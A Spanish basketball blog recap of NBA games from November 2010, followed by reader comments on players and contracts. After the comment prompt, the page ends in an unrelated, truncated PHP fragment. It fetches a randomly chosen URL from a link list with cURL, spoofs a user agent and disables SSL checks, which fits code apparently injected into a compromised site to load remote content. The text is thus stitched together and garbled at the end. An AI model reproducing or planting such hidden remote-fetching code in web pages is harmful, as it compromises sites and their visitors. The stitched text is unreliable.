La Crónica (01/11/2010)

02 de November de 2010 por txusma

Volvemos a la carga tras jornada festiva. Hasta unos freakys como nosotros tenemos compromisos sociales y familiares en ciertos días señalados. Sabemos que no nos lo tendréis en cuenta.

Tampoco nos perdimos demasiado del día anterior. Miami o Lakers no tuvieron piedad de los Nets ni de los Warriors. Tampoco los Mavs con los Clippers. Lo más reseñable fue la brutal actuación de Paul Millsap para estrenar a los Jazz sobre los Thunder y los MVPs semanales de Rondo y Pau.

Anoche tampoco hubo demasiada actividad. Los Blazers llegaban invictos a Chicago y les duró poco la esperanza de mantenerse así (98-110). Luol Deng hizo el partido de su vida pasándole por encima a Batum y anotando 40 puntos. Parece que le va bien jugar frente a los Blazers porque su segunda mejor marca anotadora de la carrera también la logró contra los de Oregon. Rudy contribuyó al desastre de su equipo con 0 de 6 para un total de 0 de 14 en triples. Sólo Aldridge mantuvo una cierta eficiencia ofensiva.

Asistimos también a la enésima decepción de los Clippers. Cuentan por derrotas sus partidos, la mayor parte de ellos en su propio feudo. Ayer los Spurs simplemente se mantuvieron correctos (97-88). Si los Clippers ponen un circo les crecen los enanos. No alcanzamos a entender su rendimiento. Son el peor equipo anotador de la competición y el nº 19 en puntos recibidos.

Por último los Kings se llevaron en el alambre un partido que tenían perdido contra los Raptors (108-111). Encajaron un 33-16 en el primer cuarto y remontaron como si nada. Típico del equipo canadiense. Calderon jugó su primer buen partido de la temporada. ¿Inicio de algo o gota en el desierto?

PREMIOS

MVP: Luol Deng fue el principal protagonista de unos Bulls que ya empiezan a marcar terreno. Sus 40 puntos marcan un nuevo récord en su carrera.

Rookie: Blake Griffin continúa a un nivel muy alto como demuestran los 17 puntos y 8 rebotes que consiguió ayer. Demarcus Cousins se fue a los 16 puntos y Eric Bledsoe estrenó titularidad ante las bajas de Davis y Foye con 9 puntos, 5 rebotes, 3 asitencias, 4 robos y 2 tapones. Más completo imposible.

Sorpresa: El ex-jugador del Barça, Gary Neal, etá jugando un importante papel en los Spurs. Sus 16 puntos y 6 rebotes saliendo desde el banco fueron muy importantes para logarar la victoria.

Decepción: Leandro Barbosa debería aportar anotación a la segunda unidad de los Raptors pero si lo sigue haciendo tan bien como ayer (2 puntos, 1 de 6 en tiro) tenrán que encargarle la misión a cualquier otro.

Esfuerzo en vano: Lamarcus Aldridge volvió loco a Taj Gibson y a todo el que se le puso por delante. Desgraciadamente sus 33 puntos y 9 rebotes coincidieron con el partidazo de Luol Deng y no pudo llevarse la victoria. Los 23 puntos y 11 asistencias de Eric Gordon tampoco encontraron recompensa.

Comenta

16 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Nuevo contrato de Conley: 5 años x 45 kilos
    Me quedo a cuadros…

      Citar

  2. Viva_Dirk dice:
    #2

    Increible lo de la pareja Bargnani-Evans, uno 28 puntos y 2 rebotes, el otro 6 puntos y 19 rebotes. Veremos que papel tiene Ed Davis cuando vuelva de su lesión.

      Citar

  3. Viva_Dirk dice:
    #3

    Joder, ¿en Memphis no se cansan de hacer las cosas mal? Podrian haber guardado el dinero para algo mejor, ya que después tendran que renovar a Mayo y a Marc, que se merecen mas la pasta que Conley.

    En fin, veremos cuanto dinero esta dispuesto a gastar el propietario.

      Citar

  4. sergio dice:
    #4

    Estaba yo pensando… sabeis porque no le dan bola a Cole Aldrich en OKC? Vale que no es un jugador que se adapte demasiado a las condiciones de juego del equipo, pero en defensas estáticas creo que está por encima de gente Krstic.

    Podian haberselo dejado a NOH que lo necesita mas

      Citar

  5. sergio dice:
    #5

    Por cierto Deer… ni Conley se merece 9 kilos ni Horford 12. Aunque sobre todo lo digo por que los equipos deberían empezar a pensar en la reducción de presupuesto para fichas de cara al año que viene.

    Aparte de lo dicho de Cole Aldrich… por ahora podriamos hacer una lista de jugadores poco usados en sus equipos como Splitter, Monroe….

      Citar

  6. Txusma dice:
    #6

    Creo q Splitter debutó precisamente ayer. Poco a poco irá entrando, sin duda.
    Lo de Monroe sí que es inexplicable y más en un equipo como los Pistons.

      Citar

  7. Txusma dice:
    #7

    Por cierto, parece ser que Von Wafer y Delonte West se calentaron después de un entrenamiento hace un par de días. Malos vientos en los Celtics.
    Y los Wolves han extendido los contratos de Love y Beasley pero no el de Corey Brewer. No lo hizo tan mal el año pasado y más teniendo en cuenta q estuvo parado todo el año anterior por una lesión, no?

      Citar

  8. troll dice:
    #8

    Horford se merece 12 kilos

      Citar

  9. GreenPride dice:
    #9

    De lo que vi ayer Bulls-Blazers, clara victoria de los Bulls con un impresionante Luol Deng. Para mí este jugador es la clave de la temporada de los Bulls, si consigue anotar con consistencia el equipo de Chicago puede ser muy difícil de parar si no lo tendrán difícil en ataque sobre todo hasta que vuelva Boozer. Buena dirección de Rose y los demás aportando. En los Blazers mal partido general, horrible Rudy y sólo mantuvieron la cara porque Aldridge estuvo imponente.
    El Clippers-Spurs claramente dominado por los Spurs todo el partido. Debut de Splitter que irá entrando poco a poco en el equipo, bien Manudonna y Parker y Neal metiendolo todo. Los Clippers tienen buenos jugadores (Griffin, Gordon, Kaman) pero hacen un poco la guerra por su cuenta y no acaban de cuajar como equipo. Veremos si acaban encontrando los mecanismos pero de momento ya van 4 derrotas, nada nuevo para el hermano pobre en L.A.

      Citar

  10. Tiago dice:
    #10

    Los Clippers son la mayor banda que hay en la NBA. Sin Gordon y Kaman en pista estaban perdidísimos. Si no es por 2 triples consecutivos de Gomes el partido se termina en la primera parte. Griffin bien pero creo que es un poco limitado en ataque…

    No creo que Splitter tenga que estar en la lista de jugadores poco usados. Hoy era su primer partido después de la lesion y tenia minutos limitados. Se le ha visto nervioso pero vamos creo que será importante.

    Manudona y Parker a lo suyo y Gary Neal ya se despertará de su sueño.

      Citar

  11. HisRoyalAirness dice:
    #11

    Pues a mÌ no me parece normal que un equipo con los mimbres de los Clippers muerda el polvo día sí y dÍa también. Vale que puede ser problema de compenetración y de rodaje como equipo pero eso es tarea del entrenador; si no sabe definir los roles (empezando por Baron Davis, que no es ni sombra de lo que fue) hay que darle puerta porque ya solo una pareja interior Kaman-Griffin es mucho más aprovechable de lo que lo está siendo.
    Y, sinceramente, el rookie no me parece nada limitado, me parece un verdadero superdotado que está en un equipo que no es consciente del regalito que le ha caído.

      Citar

  12. Denise dice:
    #12

    Otra cagada mas de Wallace y ya van…..Si a Conley le ofrecen este pastizal…cuanto le ofreceran a Marc??

    Reggie Evans en ataque es un cero a la izquierda pero en defensa es brutal, el tío se faja bajo los aros de maravilla a pesar de que no es muy alto, coge infinidad de rebotes (ya lo hizo en Philly en aquella gran temporada de Sixers del 07-08) y reparte cera, que da gusto. Es listo, conoce sus limitaciones (todas), y sabe que para jugar unos minutos debe hacerlo al 150% para contrarrestar su pésima calidad con garra e intensidad.. y lo hace.
    Para mí, es de estos paquetes que te apetecen ver, porque al menos salen motivados juegue en el equipo que juegue, al contrario de otros pufos como los Collins, Madsen, etc… ;

      Citar

  13. LEmontus dice:
    #13

    De Splitter todavía no se puede hablar porque si no ha jugado es por que ha estado lesionado. Ayer debutó aunque con pocos minutos de poca importancia y la verdad que mal, se le vió un poco nerivioso, pero habrá que verlo cuando vaya teniendo minutos.

    Lo de Clippers no lo entiendo espero que cambien algo sobre todo en defensa no puede ser que el jugador que más puntos meta en la pintura se Parker… Yo les dí PO sobrados pero tienen que mejorar bastante.

    Por último que hace Duncan jugando?? y que hace SAS dándole tantos balones??? hoy ha metido solo una canasta difícil luego todo canastas fáciles y muhcos fallos, eso por no hablar de las pérdidas.

      Citar

  14. Tobal dice:
    #14

    Me parece una barbaridad,el contrato a Conley,es un buen base pero no para darle ese dineral,por otra parte,nueva derrota de Clippers,que empiezan decepcionando una vez más,y eso que tiene un equipo bastante apañado,pero año tras año,no terminan de empezar bien.

      Citar

  15. HisRoyalAirness dice:
    #15

    Por mí Duncan puede jugar hasta que le apetezca, como si juega de rodillas, se tira 30 tiros y los falla todos. Me ha dado una década de infinita (y merecida) admiración.
    Dios salve al mejor power forward EVER!!!

      Citar

  16. Tiago dice:
    #16

    Amen

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>